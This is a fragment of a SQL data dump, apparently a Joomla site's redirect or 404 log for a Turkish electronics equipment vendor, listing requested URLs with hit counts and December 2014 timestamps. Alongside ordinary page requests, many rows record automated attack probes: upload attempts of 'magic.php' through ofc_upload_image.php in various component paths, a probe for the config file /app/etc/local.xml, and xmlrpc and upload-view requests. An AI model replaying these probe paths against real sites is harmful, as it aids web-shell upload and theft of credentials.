00:00:00',301),(6686,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:58','0000-00-00 00:00:00',301),(6687,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:05:58','0000-00-00 00:00:00',301),(6688,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:05:59','0000-00-00 00:00:00',301),(6689,'http://www.3s-technologies.com.tr/index.php/en/homepage2/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:06:00','0000-00-00 00:00:00',301),(6690,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',2,0,'2014-12-06 13:06:00','0000-00-00 00:00:00',301),(6691,'http://www.3s-technologies.com.tr/index.php/en/homepage2/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',2,0,'2014-12-06 13:06:01','0000-00-00 00:00:00',301),(6692,'http://3s-technologies.com.tr/index.php/en/?Itemid=152&id=151&lang=en&option=com_content&view=article','','','',2,0,'2014-12-06 14:21:22','0000-00-00 00:00:00',301),(6693,'http://3s-technologies.com.tr/index.php/en/?Itemid=117&catid=54:pcb-ve-stensil-temizleme-makineleri&id=119:trident&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 14:21:27','0000-00-00 00:00:00',301),(6694,'http://3s-technologies.com.tr/index.php/en/?Itemid=154&id=153&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 15:28:27','0000-00-00 00:00:00',301),(6695,'http://3s-technologies.com.tr/index.php/en/?Itemid=110&id=53&lang=tr&option=com_content&view=category','','','',4,0,'2014-12-06 17:03:13','0000-00-00 00:00:00',301),(6696,'http://3s-technologies.com.tr/index.php/en/?Itemid=120&id=109&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 17:36:09','0000-00-00 00:00:00',301),(6697,'http://3s-technologies.com.tr/index.php/en/?Itemid=113&id=106&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 19:08:51','0000-00-00 00:00:00',301),(6698,'http://3s-technologies.com.tr/index.php/en/?Itemid=121&catid=40:temizleme&id=110:ekonomik-flux-giderici-pro&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 19:10:50','0000-00-00 00:00:00',301),(6699,'http://3s-technologies.com.tr/index.php/en/?Itemid=120&catid=40:temizleme&id=109:orta-guclu-flux-giderici-dc1&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 20:45:12','0000-00-00 00:00:00',301),(6700,'http://3s-technologies.com.tr/index.php/en/?Itemid=37&id=36:orta-hizli&lang=tr&layout=default&option=com_content&view=category','','','',4,0,'2014-12-06 22:19:54','0000-00-00 00:00:00',301),(6701,'http://3s-technologies.com.tr/index.php/en/?Itemid=164&catid=60:ikinciel&id=173:avf1&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 22:21:58','0000-00-00 00:00:00',301),(6702,'http://3s-technologies.com.tr/index.php/en/?Itemid=78&catid=42:th-dizgi&id=72:av131&lang=en&option=com_content&view=article','','','',8,0,'2014-12-06 23:54:11','0000-00-00 00:00:00',301),(6703,'http://3s-technologies.com.tr/index.php/en/?Itemid=140&catid=56:rework-stasyonlari&id=138:flo-master-z-&lang=en&option=com_content&view=article','','','',4,0,'2014-12-06 23:57:00','0000-00-00 00:00:00',301),(6704,'http://3s-technologies.com.tr/index.php/en/?Itemid=27&id=42:th-dizgi&lang=tr&layout=default&option=com_content&view=category','','','',4,0,'2014-12-07 00:58:57','0000-00-00 00:00:00',301),(6705,'http://3s-technologies.com.tr/index.php/en/?Itemid=164&catid=60:ikinciel&id=174:rh61&lang=en&option=com_content&view=article','','','',4,0,'2014-12-07 01:28:38','0000-00-00 00:00:00',301),(6706,'http://3s-technologies.com.tr/index.php/en/?Itemid=50&id=1&lang=tr&layout=blog&option=com_content&view=category','','','',4,0,'2014-12-07 01:28:43','0000-00-00 00:00:00',301),(6707,'http://3s-technologies.com.tr/index.php/en/?Itemid=126&catid=40:temizleme&id=115:kutulanmis-hava-air&lang=en&option=com_content&view=article','','','',8,0,'2014-12-07 02:34:52','0000-00-00 00:00:00',301),(6708,'http://3s-technologies.com.tr/index.php/en/?Itemid=62&id=46:konveyorler&lang=tr&layout=default&option=com_content&view=category','','','',4,0,'2014-12-07 03:03:44','0000-00-00 00:00:00',301),(6709,'http://3s-technologies.com.tr/index.php/en/?Itemid=113&id=106&lang=tr&option=com_content&view=article','','','',2,0,'2014-12-07 03:09:02','0000-00-00 00:00:00',301),(6710,'http://3s-technologies.com.tr/index.php/en/?Itemid=164&id=60:ikinciel&lang=tr&layout=default&option=com_content&view=category','','','',4,0,'2014-12-07 07:47:55','0000-00-00 00:00:00',301),(6711,'http://3s-technologies.com.tr/index.php/en/?Itemid=143&catid=56:rework-stasyonlari&id=141:marksman&lang=en&option=com_content&view=article','','','',4,0,'2014-12-07 09:23:06','0000-00-00 00:00:00',301),(6712,'http://3s-technologies.com.tr/index.php/en/?Itemid=159&catid=44:pota&id=158:14fsfd&lang=tr&option=com_content&view=article','','','',4,0,'2014-12-07 10:57:34','0000-00-00 00:00:00',301),(6713,'http://3s-technologies.com.tr/index.php/en/?Itemid=161&catid=41:smd-firin&id=160:gf-12-hcht&lang=en&option=com_content&view=article','','','',10,0,'2014-12-07 12:32:13','0000-00-00 00:00:00',301),(6714,'http://3s-technologies.com.tr/index.php/en/?Itemid=55&id=41&lang=tr&option=com_content&view=category','','','',2,0,'2014-12-07 21:59:56','0000-00-00 00:00:00',301),(6715,'http://3s-technologies.com.tr/index.php/en/?Itemid=60&id=40:temizleme&lang=en&layout=default&option=com_content&view=category','','','',10,0,'2014-12-07 22:00:00','0000-00-00 00:00:00',301),(6716,'http://3s-technologies.com.tr/index.php/en/?Itemid=27&id=42&lang=tr&option=com_content&view=category','','','',4,0,'2014-12-08 01:09:24','0000-00-00 00:00:00',301),(6717,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=98&Itemid=109&lang=tr','','','',113,0,'2014-12-08 04:27:55','0000-00-00 00:00:00',301),(6718,'http://3s-technologies.com.tr/index.php/en/?Itemid=116&catid=54:pcb-ve-stensil-temizleme-makineleri&id=120:trident&lang=en&option=com_content&view=article','','','',8,0,'2014-12-08 07:27:24','0000-00-00 00:00:00',301),(6719,'http://3s-technologies.com.tr/index.php/en/?Itemid=142&id=140&lang=tr&option=com_content&view=article','','','',2,0,'2014-12-08 09:02:01','0000-00-00 00:00:00',301),(6720,'http://3s-technologies.com.tr/index.php/en/?Itemid=157&catid=44:pota&id=156:lf-350b&lang=en&option=com_content&view=article','','','',4,0,'2014-12-08 10:36:32','0000-00-00 00:00:00',301),(6721,'http://3s-technologies.com.tr/index.php/en/?Itemid=56&id=44&lang=tr&option=com_content&view=category','','','',4,0,'2014-12-08 18:30:26','0000-00-00 00:00:00',301),(6722,'http://3s-technologies.com.tr/index.php/en/?Itemid=104&id=93&lang=tr&option=com_content&view=article','','','',4,0,'2014-12-09 16:50:56','0000-00-00 00:00:00',301),(6723,'http://3s-technologies.com.tr/index.php/en/?Itemid=101&catid=51:neo&id=89:neosold&lang=en&option=com_content&view=article','','','',4,0,'2014-12-09 18:25:57','0000-00-00 00:00:00',301),(6724,'http://3s-technologies.com.tr/index.php/en/?Itemid=141&catid=56:rework-stasyonlari&id=139:flo-master-ii&lang=en&option=com_content&view=article','','','',4,0,'2014-12-09 19:52:07','0000-00-00 00:00:00',301),(6725,'http://3s-technologies.com.tr/index.php/en/?Itemid=145&id=57&lang=tr&option=com_content&view=category','','','',2,0,'2014-12-09 19:52:11','0000-00-00 00:00:00',301),(6726,'http://3s-technologies.com.tr/index.php/en/?Itemid=82&catid=41:smd-firin&id=73:ly-8c&lang=en&option=com_content&view=article','','','',10,0,'2014-12-09 23:11:20','0000-00-00 00:00:00',301),(6727,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components//app/etc/local.xml','','','',1,0,'2014-12-09 23:47:12','0000-00-00 00:00:00',301),(6728,'http://3s-technologies.com.tr/index.php/en/?Itemid=128&catid=40:temizleme&id=117:optik-cihaz-temizleyicileri&lang=tr&option=com_content&view=article','','','',4,0,'2014-12-10 00:45:22','0000-00-00 00:00:00',301),(6729,'http://3s-technologies.com.tr/index.php/en/?Itemid=156&catid=59:bolgesel-lehimleme-mak&id=154:spa-300&lang=en&option=com_content&view=article','','','',4,0,'2014-12-10 02:11:15','0000-00-00 00:00:00',301),(6730,'http://3s-technologies.com.tr/index.php/en/?Itemid=138&catid=56:rework-stasyonlari&id=136:chipper-smd-500&lang=en&option=com_content&view=article','','','',4,0,'2014-12-10 02:11:21','0000-00-00 00:00:00',301),(6731,'http://3s-technologies.com.tr/index.php/en/?Itemid=56&id=44:pota&lang=tr&layout=default&option=com_content&view=category','','','',2,0,'2014-12-10 02:20:07','0000-00-00 00:00:00',301),(6732,'http://3s-technologies.com.tr/index.php/en/?Itemid=119&catid=40:temizleme&id=108:yuksek-guclu-flux-giderici-spr&lang=en&option=com_content&view=article','','','',4,0,'2014-12-10 03:46:22','0000-00-00 00:00:00',301),(6733,'http://3s-technologies.com.tr/index.php/en/?Itemid=151&catid=58:dusuk-hizli-smd-dizgi&id=150:le40&lang=en&option=com_content&view=article','','','',4,0,'2014-12-10 03:55:43','0000-00-00 00:00:00',301),(6734,'http://3s-technologies.com.tr/index.php/en/?Itemid=1&id=47:aoi&lang=tr&layout=default&option=com_content&view=category','','','',4,0,'2014-12-10 03:55:48','0000-00-00 00:00:00',301),(6735,'http://3s-technologies.com.tr/index.php/en/?Itemid=149&id=58:dusuk-hizli-smd-dizgi&lang=en&layout=default&option=com_content&view=category','','','',8,0,'2014-12-10 03:55:49','0000-00-00 00:00:00',301),(6736,'http://3s-technologies.com.tr/index.php/en/?Itemid=57&id=39:lehimleme&lang=tr&layout=default&option=com_content&view=category','','','',7,0,'2014-12-10 10:05:08','0000-00-00 00:00:00',301),(6737,'http://3s-technologies.com.tr/index.php/en/?Itemid=161&id=160&lang=tr&option=com_content&view=article','','','',2,0,'2014-12-10 10:13:36','0000-00-00 00:00:00',301),(6738,'http://www.3s-technologies.com.tr/index.php/api/xmlrpc','','','',1,0,'2014-12-10 11:28:01','0000-00-00 00:00:00',301),(6739,'http://3s-technologies.com.tr/index.php/en/?Itemid=61&id=49&lang=tr&option=com_content&view=category','','','',2,0,'2014-12-10 11:39:38','0000-00-00 00:00:00',301),(6740,'http://3s-technologies.com.tr/index.php/en/?Itemid=114&id=54&lang=tr&option=com_content&view=category','','','',4,0,'2014-12-10 11:39:43','0000-00-00 00:00:00',301),(6741,'http://3s-technologies.com.tr/index.php/en/?Itemid=152&catid=58:dusuk-hizli-smd-dizgi&id=151:le40&lang=en&option=com_content&view=article','','','',4,0,'2014-12-10 11:48:19','0000-00-00 00:00:00',301),(6742,'http://3s-technologies.com.tr/index.php/en/?Itemid=2&id=43:ultra-hizli&lang=tr&layout=default&option=com_content&view=category','','','',7,0,'2014-12-10 11:48:29','0000-00-00 00:00:00',301),(6743,'http://3s-technologies.com.tr/index.php/en/?Itemid=114&id=54:pcb-ve-stensil-temizleme-makineleri&lang=en&layout=default&option=com_content&view=category','','','',8,0,'2014-12-10 11:48:29','0000-00-00 00:00:00',301),(6744,'http://3s-technologies.com.tr/index.php/en/?Itemid=126&catid=40:temizleme&id=115:kutulanmis-hava-air&lang=tr&option=com_content&view=article','','','',4,0,'2014-12-10 13:22:50','0000-00-00 00:00:00',301),(6745,'http://3s-technologies.com.tr/index.php/en/?Itemid=113&catid=44:pota&id=106:mi-300&lang=en&option=com_content&view=article','','','',4,0,'2014-12-10 16:24:02','0000-00-00 00:00:00',301),(6746,'http://3s-technologies.com.tr/index.php/en/?Itemid=1&id=55:katalog&lang=en&layout=default&option=com_content&view=category','','','',8,0,'2014-12-10 16:32:05','0000-00-00 00:00:00',301),(6747,'http://3s-technologies.com.tr/index.php/en/?Itemid=150&id=149&lang=en&option=com_content&view=article','','','',2,0,'2014-12-10 17:59:01','0000-00-00 00:00:00',301),(6748,'http://3s-technologies.com.tr/index.php/en/?Itemid=122&catid=40:temizleme&id=111:stencil-temizleme-bga&lang=tr&option=com_content&view=article','','','',4,0,'2014-12-10 17:59:09','0000-00-00 00:00:00',301),(6749,'http://3s-technologies.com.tr/index.php/en/?Itemid=92&id=51:neo&lang=tr&layout=default&option=com_content&view=category','','','',1,0,'2014-12-10 21:09:11','0000-00-00 00:00:00',301),(6750,'http://3s-technologies.com.tr/index.php/en/?Itemid=162&catid=41:smd-firin&id=159:gf-c2-ht&lang=en&option=com_content&view=article','','','',7,0,'2014-12-10 21:16:08','0000-00-00 00:00:00',301),(6751,'http://3s-technologies.com.tr/index.php/en/?Itemid=2&id=43:ultra-hizli&lang=en&layout=default&option=com_content&view=category','','','',10,0,'2014-12-10 22:50:33','0000-00-00 00:00:00',301),(6752,'http://3s-technologies.com.tr/index.php/en/?Itemid=159&catid=44:pota&id=158:14fsfd&lang=en&option=com_content&view=article','','','',8,0,'2014-12-11 00:24:55','0000-00-00 00:00:00',301),(6753,'http://3s-technologies.com.tr/index.php/en/?Itemid=147&catid=57:screen-printer&id=145:asp-300&lang=en&option=com_content&view=article','','','',10,0,'2014-12-11 01:53:59','0000-00-00 00:00:00',301),(6754,'http://3s-technologies.com.tr/index.php/en/?Itemid=56&id=44:pota&lang=en&layout=default&option=com_content&view=category','','','',8,0,'2014-12-11 03:33:58','0000-00-00 00:00:00',301),(6755,'http://3s-technologies.com.tr/index.php/en/?Itemid=27&id=42:th-dizgi&lang=en&layout=default&option=com_content&view=category','','','',8,0,'2014-12-11 03:34:03','0000-00-00 00:00:00',301),(6756,'http://3s-technologies.com.tr/index.php/en/?Itemid=62&id=46&lang=tr&option=com_content&view=category','','','',4,0,'2014-12-11 05:03:42','0000-00-00 00:00:00',301),(6757,'http://3s-technologies.com.tr/index.php/en/?Itemid=139&catid=56:rework-stasyonlari&id=137:chip-max-rosh-rdy&lang=en&option=com_content&view=article','','','',4,0,'2014-12-11 05:08:39','0000-00-00 00:00:00',301),(6758,'http://3s-technologies.com.tr/index.php/en/?Itemid=126&id=115&lang=tr&option=com_content&view=article','','','',2,0,'2014-12-11 08:13:34','0000-00-00 00:00:00',301),(6759,'http://3s-technologies.com.tr/index.php/en/?Itemid=161&catid=41:smd-firin&id=160:gf-12-hcht&lang=tr&option=com_content&view=article','','','',7,0,'2014-12-11 08:13:39','0000-00-00 00:00:00',301),(6760,'http://3s-technologies.com.tr/index.php/en/?Itemid=87&catid=43:ultra-hizli&id=80:cm101&lang=tr&option=com_content&view=article','','','',4,0,'2014-12-11 09:48:17','0000-00-00 00:00:00',301),(6761,'http://3s-technologies.com.tr/index.php/en/?Itemid=164&catid=60:ikinciel&id=176:jvk1&lang=en&option=com_content&view=article','','','',4,0,'2014-12-11 11:23:15','0000-00-00 00:00:00',301),(6762,'http://3s-technologies.com.tr/index.php/en/?Itemid=128&catid=40:temizleme&id=117:optik-cihaz-temizleyicileri&lang=en&option=com_content&view=article','','','',8,0,'2014-12-11 14:32:48','0000-00-00 00:00:00',301),(6763,'http://3s-technologies.com.tr/index.php/en/?Itemid=127&catid=40:temizleme&id=116:sogutucu-sprey-frz&lang=en&option=com_content&view=article','','','',9,0,'2014-12-11 16:11:41','0000-00-00 00:00:00',301),(6764,'http://3s-technologies.com.tr/index.php/en/?Itemid=134&id=127&lang=tr&option=com_content&view=article','','','',4,0,'2014-12-11 16:11:56','0000-00-00 00:00:00',301),(6765,'http://3s-technologies.com.tr/index.php/en/?Itemid=28&id=1&lang=tr&layout=blog&option=com_content&view=category','','','',4,0,'2014-12-11 16:12:05','0000-00-00 00:00:00',301),(6766,'http://3s-technologies.com.tr/index.php/en/?Itemid=114&id=54:pcb-ve-stensil-temizleme-makineleri&lang=tr&layout=default&option=com_content&view=category','','','',1,0,'2014-12-11 17:46:02','0000-00-00 00:00:00',301),(6767,'http://3s-technologies.com.tr/index.php/en/?Itemid=128&id=117&lang=tr&option=com_content&view=article','','','',2,0,'2014-12-11 19:16:36','0000-00-00 00:00:00',301),(6768,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:22:34','0000-00-00 00:00:00',301),(6769,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:22:37','0000-00-00 00:00:00',301),(6770,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:22:43','0000-00-00 00:00:00',301),(6771,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:22:43','0000-00-00 00:00:00',301),(6772,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:22:44','0000-00-00 00:00:00',301),(6773,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:23:00','0000-00-00 00:00:00',301),(6774,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:23:01','0000-00-00 00:00:00',301),(6775,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:23:02','0000-00-00 00:00:00',301),(6776,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:23:23','0000-00-00 00:00:00',301),(6777,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:23:23','0000-00-00 00:00:00',301),(6778,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:23:24','0000-00-00 00:00:00',301),(6779,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:23:24','0000-00-00 00:00:00',301),(6780,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:23:25','0000-00-00 00:00:00',301),(6781,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:23:26','0000-00-00 00:00:00',301),(6782,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:23:27','0000-00-00 00:00:00',301),(6783,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:23:27','0000-00-00 00:00:00',301),(6784,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:23:28','0000-00-00 00:00:00',301),(6785,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:23:29','0000-00-00 00:00:00',301),(6786,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',4,0,'2014-12-11 21:23:30','0000-00-00 00:00:00',301),(6787,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:23:36','0000-00-00 00:00:00',301),(6788,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',4,0,'2014-12-11 21:24:04','0000-00-00 00:00:00',301),(6789,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:21:44','0000-00-00 00:00:00',301),(6790,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:21:47','0000-00-00 00:00:00',301),(6791,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:21:48','0000-00-00 00:00:00',301),(6792,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:21:50','0000-00-00 00:00:00',301),(6793,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:21:51','0000-00-00 00:00:00',301),(6794,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:21:51','0000-00-00 00:00:00',301),(6795,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:21:52','0000-00-00 00:00:00',301),(6796,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:21:53','0000-00-00 00:00:00',301),(6797,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:21:53','0000-00-00 00:00:00',301),(6798,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:21:54','0000-00-00 00:00:00',301),(6799,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:21:54','0000-00-00 00:00:00',301),(6800,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:21:55','0000-00-00 00:00:00',301),(6801,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:21:55','0000-00-00 00:00:00',301),(6802,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:21:56','0000-00-00 00:00:00',301),(6803,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',5,0,'2014-12-13 07:21:57','0000-00-00 00:00:00',301),(6804,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:21:58','0000-00-00 00:00:00',301),(6805,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',5,0,'2014-12-13 07:21:59','0000-00-00 00:00:00',301),(6806,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:22:00','0000-00-00 00:00:00',301),(6807,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:22:02','0000-00-00 00:00:00',301),(6808,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:22:09','0000-00-00 00:00:00',301),(6809,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:22:21','0000-00-00 00:00:00',301),(6810,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:22:38','0000-00-00 00:00:00',301),(6811,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php','','','',6,0,'2014-12-13 07:22:40','0000-00-00 00:00:00',301),(6812,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp','','','',6,0,'2014-12-13 07:22:44','0000-00-00 00:00:00',301),(6813,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',1,0,'2014-12-13 15:33:31','0000-00-00 00:00:00',301),(6814,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',3,0,'2014-12-13 17:23:01','0000-00-00 00:00:00',301),(6815,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',1,0,'2014-12-14 00:09:58','0000-00-00 00:00:00',301),(6816,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119','','','',1,0,'2014-12-14 01:06:45','0000-00-00 00:00:00',301),(6817,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119','','','',1,0,'2014-12-14 01:36:19','0000-00-00 00:00:00',301),(6818,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',1,0,'2014-12-14 02:36:13','0000-00-00 00:00:00',301),(6819,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139','','','',1,0,'2014-12-14 14:33:55','0000-00-00 00:00:00',301),(6820,'http://www.3s-technologies.com.tr/index.php?option=com_community&view=frontpage&141214-202045','','','',1,0,'2014-12-14 19:20:57','0000-00-00 00:00:00',301),(6821,'http://www.3s-technologies.com.tr/index.php?141214-202052','','','',1,0,'2014-12-14 19:20:57','0000-00-00 00:00:00',301),(6822,'http://www.3s-technologies.com.tr/index.php?option=com_jdownloads&Itemid=101&view=upload&141214-202106','','','',1,0,'2014-12-14 19:21:26','0000-00-00 00:00:00',301),(6823,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_community&view=frontpage&141214-202301','','','',1,0,'2014-12-14 19:22:54','0000-00-00 00:00:00',301),(6824,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?141214-202301','','','',1,0,'2014-12-14 19:22:55','0000-00-00 